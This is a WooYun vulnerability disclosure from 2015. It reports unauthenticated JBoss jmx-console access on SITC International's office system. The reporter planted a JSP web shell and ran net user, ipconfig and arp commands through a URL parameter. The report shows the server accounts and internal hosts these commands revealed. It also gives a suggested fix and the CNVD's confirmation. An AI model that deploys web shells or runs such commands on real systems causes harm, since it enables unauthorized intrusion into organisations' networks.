当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153110

漏洞标题:海丰国际某办公系统Jboss未授权访问可导致Getshell/命令执行/内部多台主机

相关厂商:海丰国际控股有限公司

漏洞作者: 路人甲

提交时间:2015-11-09 18:56

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:网络未授权访问

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

海丰国际某办公系统Jboss未授权访问可导致Getshell/命令执行/内部多台主机

详细说明:

海丰国际控股有限公司

1.png


看看百度权重吧!

百度权重 	2  移动权重 	1
百度来路 预计来路:436 ~ 568IP
**.**.**.**
**.**.**.**
(PC端)来路 300 ~ 349IP (移动)来路 136 ~ 219IP
总收录 7,140条记录


QQ截图20151109184302.png


海丰国际协同办公自动化系统
**.**.**.**:8080/SitcOA/

2.png


Jbossw未授权访问。
**.**.**.**:8080/jmx-console/

3.png


下面Getsehll、**.**.**.**:8080/zmeu/zmeu.jsp

4.png


执行命令、
net user

\\WINDOWS-1HUI0S2 的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_WINDOWS-1HUI0S2 sql
命令成功完成。


5.png


**.**.**.**:8080/zmeu/zmeu.jsp?comment=ipconfig

以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::6c6f:c81f:e86d:45e0%10
IPv4 地址 . . . . . . . . . . . . : **.**.**.**
子网掩码 . . . . . . . . . . . . : **.**.**.**
默认网关. . . . . . . . . . . . . : **.**.**.**


6.png


内网多台主机。

接口: **.**.**.** --- 0xa
Internet 地址 物理地址 类型
**.**.**.** e4-1f-13-b9-33-ec 动态
**.**.**.** 5c-f3-fc-db-64-00 动态
**.**.**.** e4-1f-13-e3-35-f4 动态
**.**.**.** 5c-f3-fc-94-7d-f0 动态
**.**.**.** 40-f2-e9-64-61-a8 动态
**.**.**.** 5c-f3-fc-4c-7b-a4 动态
**.**.**.** e6-78-10-8b-28-0f 动态
**.**.**.** e4-1f-13-50-e6-21 动态
**.**.**.** 5c-f3-fc-e9-b4-02 动态
**.**.**.** d4-ae-52-8c-df-83 动态
**.**.**.** 5e-d1-69-7b-76-0a 动态
**.**.**.** 00-13-7f-5f-f6-bf 动态
**.**.**.** 64-00-f1-3e-71-ff 动态
**.**.**.** 00-00-0c-07-ac-07 动态
**.**.**.** 01-00-5e-00-00-16 静态
**.**.**.** 01-00-5e-00-00-fc 静态
**.**.**.** 01-00-5e-7f-ff-fa 静态


7.png


ok、点到为止、、

漏洞证明:

^^^^^^^^上面^^^^^^^

修复方案:

升级Jboss进行加帐号面、对服务器进行shell 和木马的清理、、

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-20 14:39

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无